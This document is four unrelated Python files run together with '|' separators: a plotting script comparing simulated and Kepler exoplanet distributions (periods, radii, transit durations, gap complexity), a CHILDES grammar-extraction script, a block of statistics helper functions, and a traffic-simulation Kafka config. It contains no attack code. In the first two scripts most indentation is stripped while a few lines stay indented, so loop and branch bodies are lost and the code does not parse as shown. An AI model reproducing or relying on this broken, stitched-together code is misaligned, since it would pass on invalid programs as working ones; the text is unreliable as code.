ax = plot_fig_pdf_simple(fig_size, [], [], x_min=P_min, x_max=P_max, y_min=0, y_max=1, log_x=True, xticks_custom=[3,10,30,100,300], xlabel_text=r'$P$ (days)', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
    #kde_pts_Kep = P_kde_Kep[sample](np.log10(P_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(P_kde_Kep[sample], np.log10(P_axis), kNN_factor=kNN_factor)
plt.plot(P_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i], label='Kepler' if i==0 else '')
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = P_kde_all[sample][n](np.log10(P_axis))
kde_pts, bw_pts = kde_kNN_bw(P_kde_all[sample][n], np.log10(P_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(P_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i], label=r'Simulated draws' if i==0 and n==0 else '')
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(P_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha, label=r'Simulated 16-84%' if i==0 else '')
#ax.set_yscale('log')
plt.legend(loc='upper right', bbox_to_anchor=(1,1), ncol=1, frameon=False, fontsize=lfs)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_periods_compare.pdf')
plt.close()
# Period ratios (all, with some upper cut-off):
Rm_axis = np.logspace(np.log10(1.), np.log10(30.), pts)
R_max_cut = np.max(Rm_axis)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(Rm_axis), x_max=R_max_cut, y_max=5, log_x=True, xticks_custom=[1,2,3,4,5,10,20], xlabel_text=r'$\mathcal{P} = P_{i+1}/P_i$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = Rm_kde_Kep[sample](np.log10(Rm_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(Rm_kde_Kep[sample], np.log10(Rm_axis), kNN_factor=kNN_factor)
plt.plot(Rm_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = Rm_kde_all[sample][n](np.log10(Rm_axis))
kde_pts, bw_pts = kde_kNN_bw(Rm_kde_all[sample][n], np.log10(Rm_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(Rm_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(Rm_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_periodratios_compare.pdf')
plt.close()
# Transit durations:
tdur_axis = np.linspace(0., 12., pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(tdur_axis), x_max=np.max(tdur_axis), y_max=0.4, xlabel_text=r'$t_{\rm dur}$ (hrs)', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_kde_Kep[sample](tdur_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_kde_Kep[sample], tdur_axis, kNN_factor=kNN_factor)
plt.plot(tdur_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_kde_all[sample][n](tdur_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_kde_all[sample][n], tdur_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(tdur_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_durations_compare.pdf')
plt.close()
# Circular normalized transit durations (separate singles and multis):
tdur_tcirc_axis = np.linspace(0., 1.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=5, extra_text='Observed singles', xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_1_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_1_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_1_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_1_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
    kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
    plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_singles_compare.pdf')
plt.close()
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=5, extra_text='Observed multis', xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_2p_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_2p_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_2p_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_2p_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
    kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
    plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_multis_compare.pdf')
plt.close()
# Transit depths:
D_axis = np.logspace(-5., -1.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(D_axis), x_max=np.max(D_axis), y_max=1.4, log_x=True, xlabel_text=r'$\delta$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = D_kde_Kep[sample](np.log10(D_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(D_kde_Kep[sample], np.log10(D_axis), kNN_factor=kNN_factor)
plt.plot(D_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = D_kde_all[sample][n](np.log10(D_axis))
kde_pts, bw_pts = kde_kNN_bw(D_kde_all[sample][n], np.log10(D_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(D_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(D_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_depths_compare.pdf')
plt.close()
# Planet radii:
radii_axis = np.linspace(radii_min, radii_max, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=radii_min, x_max=radii_max, y_max=0.5, xlabel_text=r'$R_p (R_\oplus)$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = radii_kde_Kep[sample](radii_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(radii_kde_Kep[sample], radii_axis, kNN_factor=kNN_factor)
plt.plot(radii_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = radii_kde_all[sample][n](radii_axis)
kde_pts, bw_pts = kde_kNN_bw(radii_kde_all[sample][n], radii_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(radii_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(radii_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_radii_compare.pdf')
plt.close()
# Stellar radii:
Rstar_axis = np.linspace(0.5, 2.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(Rstar_axis), x_max=np.max(Rstar_axis), y_max=3, xlabel_text=r'$R_\star (R_\odot)$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = Rstar_kde_Kep[sample](Rstar_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(Rstar_kde_Kep[sample], Rstar_axis, kNN_factor=kNN_factor)
plt.plot(Rstar_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = Rstar_kde_all[sample][n](Rstar_axis)
kde_pts, bw_pts = kde_kNN_bw(Rstar_kde_all[sample][n], Rstar_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(Rstar_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(Rstar_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_stellar_radii_compare.pdf')
plt.close()
# Transit depth ratios:
D_ratio_axis = np.logspace(-1.5, 1.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(D_ratio_axis), x_max=np.max(D_ratio_axis), y_max=1.6, log_x=True, xlabel_text=r'$\delta_{i+1}/\delta_i$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = D_ratio_kde_Kep[sample](np.log10(D_ratio_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(D_ratio_kde_Kep[sample], np.log10(D_ratio_axis), kNN_factor=kNN_factor)
plt.plot(D_ratio_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = D_ratio_kde_all[sample][n](np.log10(D_ratio_axis))
kde_pts, bw_pts = kde_kNN_bw(D_ratio_kde_all[sample][n], np.log10(D_ratio_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(D_ratio_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(D_ratio_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_depthratios_compare.pdf')
plt.close()
# Log(xi):
xi_axis = np.linspace(-0.5, 0.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(xi_axis), x_max=np.max(xi_axis), y_max=10, xlabel_text=r'$\log{\xi}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = xi_kde_Kep[sample](xi_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(xi_kde_Kep[sample], xi_axis, kNN_factor=kNN_factor)
plt.plot(xi_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = xi_kde_all[sample][n](xi_axis)
kde_pts, bw_pts = kde_kNN_bw(xi_kde_all[sample][n], xi_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(xi_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(xi_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_logxi_all_compare.pdf')
plt.close()
# Log(xi) (not near MMR):
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(xi_axis), x_max=np.max(xi_axis), y_max=10, extra_text='Not near MMR', xlabel_text=r'$\log{\xi}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = xi_nonres_kde_Kep[sample](xi_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(xi_nonres_kde_Kep[sample], xi_axis, kNN_factor=kNN_factor)
plt.plot(xi_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = xi_nonres_kde_all[sample][n](xi_axis)
kde_pts, bw_pts = kde_kNN_bw(xi_nonres_kde_all[sample][n], xi_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(xi_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(xi_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_logxi_nonmmr_compare.pdf')
plt.close()
# Log(xi) (near MMR):
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(xi_axis), x_max=np.max(xi_axis), y_max=10, extra_text='Near MMR', xlabel_text=r'$\log{\xi}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = xi_res_kde_Kep[sample](xi_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(xi_res_kde_Kep[sample], xi_axis, kNN_factor=kNN_factor)
plt.plot(xi_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = xi_res_kde_all[sample][n](xi_axis)
kde_pts, bw_pts = kde_kNN_bw(xi_res_kde_all[sample][n], xi_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(xi_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(xi_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_logxi_mmr_compare.pdf')
plt.close()
### GF2020 metrics:
# Planet radii partitioning:
radii_partitioning_axis = np.logspace(-5., 0., pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=1e-5, x_max=1., y_max=0.7, xlabel_text=r'$\mathcal{Q}_R$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = radii_partitioning_kde_Kep[sample](np.log10(radii_partitioning_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(radii_partitioning_kde_Kep[sample], np.log10(radii_partitioning_axis), kNN_factor=kNN_factor)
plt.plot(radii_partitioning_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = radii_partitioning_kde_all[sample][n](np.log10(radii_partitioning_axis))
kde_pts, bw_pts = kde_kNN_bw(radii_partitioning_kde_all[sample][n], np.log10(radii_partitioning_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(radii_partitioning_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(radii_partitioning_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_radii_partitioning_compare.pdf')
plt.close()
# Planet radii monotonicity:
radii_monotonicity_axis = np.linspace(-0.5, 0.6, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=-0.5, x_max=0.6, y_max=4, xlabel_text=r'$\mathcal{M}_R$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = radii_monotonicity_kde_Kep[sample](radii_monotonicity_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(radii_monotonicity_kde_Kep[sample], radii_monotonicity_axis, kNN_factor=kNN_factor)
plt.plot(radii_monotonicity_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = radii_monotonicity_kde_all[sample][n](radii_monotonicity_axis)
kde_pts, bw_pts = kde_kNN_bw(radii_monotonicity_kde_all[sample][n], radii_monotonicity_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(radii_monotonicity_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(radii_monotonicity_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_radii_monotonicity_compare.pdf')
plt.close()
# Gap complexity:
gap_complexity_axis = np.linspace(0., 1., pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=0., x_max=1., y_max=10, xlabel_text=r'$\mathcal{C}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = gap_complexity_kde_Kep[sample](gap_complexity_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(gap_complexity_kde_Kep[sample], gap_complexity_axis, kNN_factor=kNN_factor)
plt.plot(gap_complexity_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = gap_complexity_kde_all[sample][n](gap_complexity_axis)
kde_pts, bw_pts = kde_kNN_bw(gap_complexity_kde_all[sample][n], gap_complexity_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(gap_complexity_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(gap_complexity_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_gap_complexity_compare.pdf')
plt.close()
plt.show()
#plt.close()
##### Circular normalized durations for singles and multis with PDFs and CDFs:
#'''
fig = plt.figure(figsize=(8,5))
plot = GridSpec(2,1,left=0.15,bottom=0.2,right=0.95,top=0.95,wspace=0,hspace=0)
ax = plt.subplot(plot[0,0]) # CDF
plot_panel_cdf_simple(ax, [sss['tdur_tcirc_1_obs'] for sss in split_sss], [ssk['tdur_tcirc_1_obs'] for ssk in split_ssk], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), c_sim=split_colors, c_Kep=split_colors, ls_sim=split_linestyles, ls_Kep=['--','--'], lw=lw_Kep, labels_sim=['Simulated',None], labels_Kep=['Kepler', None], extra_text='Observed singles', xlabel_text='', afs=afs, tfs=tfs, lfs=lfs, label_dist=True)
plt.legend(loc='upper left', bbox_to_anchor=(0.01,0.75), ncol=1, frameon=False, fontsize=lfs)
plt.xticks([])
ax = plt.subplot(plot[1,0]) # PDF
plot_panel_pdf_simple(ax, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=6, xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_1_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_1_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_1_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_1_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_singles_compare_with_CDFs.pdf')
plt.close()
fig = plt.figure(figsize=(8,5))
plot = GridSpec(2,1,left=0.15,bottom=0.2,right=0.95,top=0.95,wspace=0,hspace=0)
ax = plt.subplot(plot[0,0]) # CDF
plot_panel_cdf_simple(ax, [sss['tdur_tcirc_2p_obs'] for sss in split_sss], [ssk['tdur_tcirc_2p_obs'] for ssk in split_ssk], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), c_sim=split_colors, c_Kep=split_colors, ls_sim=split_linestyles, ls_Kep=['--','--'], lw=lw_Kep, labels_sim=['Simulated',None], labels_Kep=['Kepler', None], extra_text='Observed multis', xlabel_text='', afs=afs, tfs=tfs, lfs=lfs, label_dist=True)
plt.xticks([])
ax = plt.subplot(plot[1,0]) # PDF
plot_panel_pdf_simple(ax, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=6, xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_2p_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_2p_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_2p_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_2p_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_multis_compare_with_CDFs.pdf')
plt.close()
plt.show()
#'''
|
#! /usr/bin/env python
usage = """%prog Version of 26th May 2010
(c) Mark Johnson
Extracts a grammar from a CHILDES file
usage: %prog [options]"""
import optparse, re, sys
import lx, tb
def read_childes(inf):
"""Reads a CHILDES file, and yields a dictionary for each record
with key-value pairs for each field"""
for record in inf.read().split("*mot:\t")[1:]:
key_val = {}
fields = record.split("\n%")
key_val['mot'] = fields[0].strip()
for field in fields[1:]:
[key, val] = field.split(":\t", 1)
key = intern(key.strip())
val = val.strip()
if val != '':
key_val[key] = val
yield key_val
def write_gold(records, phon_topic, outf):
for record in records:
pho = record['pho'].split()
intent = record.get('int', None)
        # Tag a phone as "phone_topic" only when it is in the topic map and its
        # mapped topic matches this record's intent; otherwise leave it unchanged.
        line = ' '.join((p if p not in phon_topic or phon_topic[p] != intent else "%s_%s"%(p,phon_topic[p]) for p in pho))
outf.write("%s\n"%line)
def write_train(records, outf):
for record in records:
pho = record['pho']
pho = ' '.join(pho.replace(' ', ''))
ref = record.get('ref')
if ref:
refs = list(set(ref.split()))
refs.sort()
ref = 'T_'+'|'.join(refs)
else:
ref = 'T_None'
outf.write("%s\t%s\n"%(ref, pho))
if __name__ == "__main__":
parser = optparse.OptionParser(usage=usage)
parser.add_option("-c", "--childes-data", dest="childes_data",
help="input file containing CHILDES data")
parser.add_option("-p", "--phon-topic", dest="phon_topic",
help="input file containing phon->topic mapping")
parser.add_option("-g", "--gold", dest="gold",
help="output file containing gold training data")
parser.add_option("-t", "--train", dest="train",
help="output file containing training data")
(options,args) = parser.parse_args()
assert(len(args) == 0)
assert(options.childes_data != None)
childes = list(read_childes(file(options.childes_data, "rU")))
phon_topic = {}
if options.phon_topic:
for line in file(options.phon_topic, "rU"):
ws = line.split()
assert(len(ws) == 2)
phon_topic[ws[0]] = ws[1]
if options.gold:
write_gold(childes, phon_topic, file(options.gold, "w"))
if options.train:
write_train(childes, file(options.train, "w"))
|
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pandas as pd
import numpy as np
import scipy.stats
# NOTE: all parameter 'a' is assumed as array-like
def max(a): return np.max(a)
def min(a): return np.min(a)
def range(a): return np.max(a) - np.min(a)
def sum(a): return np.sum(a)
def mean(a): return np.mean(a)
def var(a): return np.var(a)
def var_samp(a): return np.var(a, ddof=1)
def std(a): return np.std(a)
def skewness(a): return scipy.stats.skew(a)
def kurtosis(a): return scipy.stats.kurtosis(a)
def median(a): return np.median(a)
def percentile(a, q): return np.percentile(a, q)
def trimmed_mean(a, proportiontocut): return scipy.stats.trim_mean(a, proportiontocut)
def iqr(a): return scipy.stats.iqr(a)
def q1(a): return np.percentile(a, 25)
def q3(a): return np.percentile(a, 75)
def mode(a):
a = np.array(a)
a = a[np.where(~pd.isnull(a))]
vals, cnts = np.unique(a, return_counts=True)
return vals[np.where(cnts==np.max(cnts))]
def num_row(a): return len(a)
def num_value(a): return np.count_nonzero(~pd.isnull(a))
def num_nan(a): return np.count_nonzero([x is np.nan for x in a])
def num_nullonly(a): return np.count_nonzero([x is None for x in a])
def num_null(a): return np.count_nonzero(pd.isnull(a))
def num_distinct(a): return len(np.unique(a))
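# Minimal usage sketch (illustrative values): exercise a few of the helpers on a
# small array that contains a missing value.
if __name__ == "__main__":
    sample = [1.0, 2.0, 2.0, 4.0, np.nan]
    print(mean([x for x in sample if not pd.isnull(x)]))  # 2.25 (mean of the non-null values)
    print(mode(sample))         # [2.]
    print(num_value(sample))    # 4 non-null entries
    print(num_distinct(sample))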
|
# The network config (links to the net) we use for our simulation
sumoConfig = "A9_conf.sumocfg"
# The network net we use for our simulation
sumoNet = "A9.net.xml"
mqttUpdates = False
mqttHost = "localhost"
mqttPort = "1883"
# should it use kafka for config changes & publishing data (else it uses json file)
kafkaUpdates = True
# the kafka host we want to send our messages to
kafkaHost = "kafka:9092"
# the topics we send the kafka messages to
kafkaTopicMeanCarData = "platooning-car-data"
kafkaTopicDurations = "platooning-trip-durations"
kafkaTopicPlatooningData = "platooning-data"
# where we receive system changes
kafkaPlatoonConfigTopic = "platooning-config"
# Initial wait time before publishing data, should not be changed
ignore_first_n_results = 350
